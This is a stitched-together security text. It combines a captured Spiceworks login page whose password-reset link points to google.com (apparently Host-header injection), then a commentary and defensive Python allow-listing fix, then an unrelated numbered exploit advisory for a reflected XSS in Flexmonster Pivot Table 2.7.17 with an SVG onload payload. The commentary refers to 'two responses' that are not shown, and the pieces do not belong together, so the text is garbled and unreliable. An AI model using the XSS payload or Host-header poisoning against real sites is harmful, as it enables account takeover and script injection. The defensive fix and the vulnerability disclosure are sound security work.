type="text/css" /> <link href="/assets/sui-print.css?7500070" media="print" rel="stylesheet" type="text/css" /> <link 
href="/assets/wizard.css?7500070" media="screen" rel="stylesheet" type="text/css" /> <script src="/assets/sui_bundle.js?7500070" type="text/javascript"></script> <script type="text/javascript"> //<![CDATA[ var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-314222-21']); _gaq.push(['_setDomainName', 'none']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview']); _gaq.push(['_setCustomVar', 1, '_v', '7.5.00070', 3]); _gaq.push(['_setCustomVar', 2, '_d', 'xl', 3]); _gaq.push(['_setCustomVar', 3, '_u', '2', 3]); _gaq.push(['_setCustomVar', 4, '_ul', 'anonymous', 2]); _gaq.push(['_setCustomVar', 5, '_m', 'anonymous', 2]); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); //]]> </script> <script type="text/javascript"> //<![CDATA[ SPICEWORKS.ready(function(){ SPICEWORKS.fire('app:ready'); }); document.observe('dom:loaded', function(){ SPICEWORKS.fire('ready'); }); //]]> </script> <script type="text/javascript"> //<![CDATA[ (function($){ $(document).ready(function(){ $('#flash-notice-message').delay(9000).slideUp(300); }); })(jQuery); //]]> </script> <script type="text/javascript"> //<![CDATA[ var gekko = gekko || {}; gekko.cmd = gekko.cmd || []; gekko.times = gekko.times || []; gekko.times.push({ gekkoRequest: new Date().getTime() }); gekko.client = gekko.client || {}; gekko.client.app = { 'id': 'SWD', 'env': 'p', 'version': '7.5.00070' }; gekko.client.user = {}; gekko.client.user.uuid = 'b7f707b6-f574-44bb-a766-986fc5851a03'; //]]> </script> <script async="false" src="//gekko.spiceworks.com/gekko.js" type="text/javascript"></script> <script async="true" type='text/javascript' src='//www.googletagservices.com/tag/js/gpt.js'></script> <script type="text/javascript"> //<![CDATA[ gekko.cmd.push({cmd: 
function() { gekko.setAnalytics('_v', '7.5.00070'); }, important: true}); //]]> </script> <script> var SWUFR = SWUFR || {}; SWUFR.cmd = SWUFR.cmd || []; </script> <script async src="//gekko.spiceworks.com/swufr.js"></script> <script> SWUFR.cmd.push(function() { SWUFR.ufr.installed() }); </script> </head> <!--[if lt IE 7]> <body class="left-registerlogin-desktop sui-opt-in ie ie6 lte9 lte8 lte7 desktop"> <![endif]--> <!--[if IE 7]> <body class="left-register login-desktop sui-opt-in ie ie7 lte9 lte8 lte7 desktop"> <![endif]--> <!--[if IE 8]> <body class="left-register login-desktop sui-opt-in ie ie8 lte9 lte8 desktop"> <![endif]--> <!--[if IE 9]> <body class="left-register login-desktop sui-opt-in ie ie9 lte9 desktop"> <![endif]--> <!--[if !IE]><!--> <body class="left-register login-desktop sui-opt-in no-ie desktop"> <!--<![endif]--> <header class="site-navigation sui-opt-in"> <nav class="global-nav affix" data-navbar="global" data-search-autocomplete-min-length=""> <div class="nav-fluid-container"> <a href="/" class="global-nav_brand">Home</a> <img src="//static.spiceworks.com/assets/masthead/print_logo.png" class='global-nav_print-logo' /> </div> </nav> </header> <!--[if lte IE 9]> <div class="modal hide has-footer-in-body" data-backdrop="true" data-isdraggable="false" data-keyboard="false" id="install_chrome_frame"><div class="modal-header"> <h3>I'm gonna have to go ahead and ask you to use a different browser.</h3></div><div class="modal-body"> <img id="lumberg" src="/images/other/yeeeaaah.png" style="float:left; width:200px; "> <div class="sui-opt-in" id="chrome_frame_install" style="padding-left: 10px; overflow:hidden; min-height:150px"> <p style="padding-top:10px; font-size:13px">Yeaaaah… what's happening? 
</p> <p>We went ahead and stopped supporting Internet Explorer 9 and older in the Spiceworks app (IE10+ is now required), so if you could just go ahead and upgrade IE, that would be great… </p> <p style="padding-top:10px; font-size:11px; color: #AAA;">(Doesn't take long to install, and makes Spiceworks so much faster!)</p> </div> <div class="sui-opt-in" id="chrome_frame_reload" style="padding-left: 10px; overflow:hidden;"> <h4 class=""> <strong> Whoops, looks like you might have gotten stuck. </strong> </h4> </div> <div class="footer-actions blue-permission-granted"> <a class="sui-bttn ieUpgrade" href="#" id="ieUpgrade" onclick=" upgradeIE(); ; return false;">Upgrade Internet Explorer</a> </div> </div></div> <script type="text/javascript"> //<![CDATA[ jQuery(function(){ SPICEWORKS.stats.record("chrome_frame_prompt_shown", {category: 'unsupported_ie'}); jQuery('#install_chrome_frame').modal(); }) function upgradeIE(){ SPICEWORKS.stats.record("installed_newer_ie", {category: 'unsupported_ie'}); window.location.href = "http://windows.microsoft.com/en-US/internet-explorer/download-ie"; } //]]> </script> <![endif] --> <div class="sui-fluid-container"> <div id="content"> <img alt="Startup-bg" id="bg" src="/images/wizard/startup-bg.png?7500070" /> <div id="container"> <div id="wrapper"> <div id="float-msg"> <h1>Spiceworks is ready to rock!</h1> <p>Please enter your login credentials.</p> </div> <div class="main-outer-border"><div class="main-inner-border"><div class="main-header logo"><h1><img alt="Spiceworks" class="logo" src="/images/logos/large.png?7500070" /></h1><div class="shadow-line ">&nbsp</div> </div><div class="main"> <div id="flash-container-for-sessions-new"> </div> <form accept-charset="UTF-8" action="/pro_users/login" class="form-horizontal login" id="login_form" method="post"><div style="margin:0;padding:0;display:inline"><input name="authenticity_token" type="hidden" value="r+sYwqxdzOJAV6XSoVaYQ4HObg5uTfHFjtuDg3ZmH9k=" /></div><div 
style="margin:0;padding:0;display:inline;"><input name="_pickaxe" type="hidden" value="⸕" /></div> <div class=" control-group"><label for="pro_user_email">Email</label><div class="controls"><input id="pro_user_email" label="Email" name="pro_user[email]" size="30" type="text" /><span class="help-inline"></span></div></div> <div class=" control-group"><label for="pro_user_password">Password</label><div class="controls"><input id="pro_user_password" label="Password" name="pro_user[password]" size="30" type="password" /><span class="help-inline"></span></div></div> <div class="control-group controls forgot_password"> <a href="http://google.com/wizard/password/new" class="forgot-password">Forgot your password?</a> </div> <div class=" control-group"><div class="controls"> <label class='checkbox'> <input name="pro_user[remember_me]" type="hidden" value="0" /><input id="pro_user_remember_me" name="pro_user[remember_me]" type="checkbox" value="1" /> Stay logged in </label> </div></div> <div class=" control-group"><div class="controls"> <button class="sui-bttn-primary sui-bttn " data-button-type="submit" data-primary="true" type="submit">Log in</button> </div></div> </form> </div></div></div> </div> </div> </div> </div> <div id="footer"> <hr/> <span class="pull-left"> <p>Copyright &copy; 2006-16 Spiceworks, Inc.</p> </span> <span class="pull-right"> <p> <a href="https://www.spiceworks.com/about/">About</a> &bull; <a href="https://www.spiceworks.com/privacy/">Privacy</a> &bull; <a href="https://www.spiceworks.com/terms/">Terms</a> &bull; <a href="https://community.spiceworks.com/support?utm_campaign=app_help&utm_medium=app&utm_source=app_ui">Help</a> </p> </span> </div> <script src="/assets/wizard.js?7500070" type="text/javascript"></script> </body> </html>
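The two responses above show the Host header being copied verbatim into a `Location` header and into the "Forgot your password?" link. The fix is to derive absolute URLs from a configured canonical base, or from the Host header only after it has matched an allow-list (exact match, port included). The following is an added example, not Spiceworks' code: the allowed host names, the canonical base URL and the sample requests are constructed, and the redirect body mirrors the shape of the one in the advisory. It also returns an audit flag so a request with an unrecognised Host can be logged, which is the detection side of the same finding.

```python
"""Host-header allow-listing for redirects and absolute links.

Added example, not Spiceworks' code. The allowed hosts, canonical base URL
and the sample requests are constructed. The point demonstrated is the fix
for the advisory above: the client's Host header never chooses where a
Location header or a password-reset link points.
"""
import html

ALLOWED_HOSTS = {"helpdesk.example.internal", "helpdesk.example.internal:8080"}  # assumed
CANONICAL_BASE = "http://helpdesk.example.internal"                              # assumed


def header(headers: dict, name: str) -> str:
    """Case-insensitive header lookup (HTTP header names are case-insensitive)."""
    for k, v in headers.items():
        if k.lower() == name.lower():
            return v.strip()
    return ""


def host_is_trusted(headers: dict) -> bool:
    """True only when the Host header, lower-cased and with its port, is on the allow-list.
    Exact matching matters: a suffix check would accept 'helpdesk.example.internal.attacker.tld'."""
    return header(headers, "Host").lower() in ALLOWED_HOSTS


def absolute_url(headers: dict, path: str) -> str:
    """Absolute URL for a site-relative path. An untrusted Host never reaches the result;
    the canonical base is used instead. Protocol-relative paths ('//host') are refused
    because they would let the path itself pick a foreign host."""
    if not path.startswith("/") or path.startswith("//"):
        raise ValueError("path must be site-relative")
    if host_is_trusted(headers):
        base = "http://" + header(headers, "Host").lower()
    else:
        base = CANONICAL_BASE
    return base + path


def redirect(headers: dict, path: str):
    """302 response whose Location comes from absolute_url, plus an audit flag that is
    True when the request carried a Host outside the allow-list (worth logging)."""
    location = absolute_url(headers, path)
    resp_headers = {"Location": location, "Content-Type": "text/html; charset=utf-8"}
    body = ('<html><body>You are being <a href="%s">redirected</a>.</body></html>'
            % html.escape(location, quote=True))
    return 302, resp_headers, body, not host_is_trusted(headers)


def password_reset_link(headers: dict) -> str:
    """The 'Forgot your password?' link, built the same way so it cannot be poisoned."""
    return absolute_url(headers, "/wizard/password/new")


if __name__ == "__main__":
    spoofed = {"Host": "google.com"}          # constructed, mirrors the PoC request
    print(redirect(spoofed, "/pro_users/login"))
    print(password_reset_link({"host": "Helpdesk.Example.Internal:8080"}))
```

For a Rails application (the response carries Rails-style `authenticity_token` and `X-Runtime` values), the framework's own version of this check is `config.hosts`, which makes the middleware reject requests whose Host is not on the configured list before a controller ever builds a URL from it. Whichever layer enforces it, the allow-list has to live in configuration, not be derived from the incoming request.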
25. # Exploit Title: Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
# Date: 08/01/2020
# Exploit Author: Marco Nappi
# Vendor Homepage: https://www.flexmonster.com/
# Version: Flexmonster Pivot Table & Charts 2.7.17
# Tested on: Flexmonster Pivot Table & Charts 2.7.17
# CVE : CVE-2020-20141

Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17.

Reflected XSS:
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to a non-existing file (the XSS payload). This results in the execution of the payload.

payload: <svg onload=alert("OLAPTool")><!--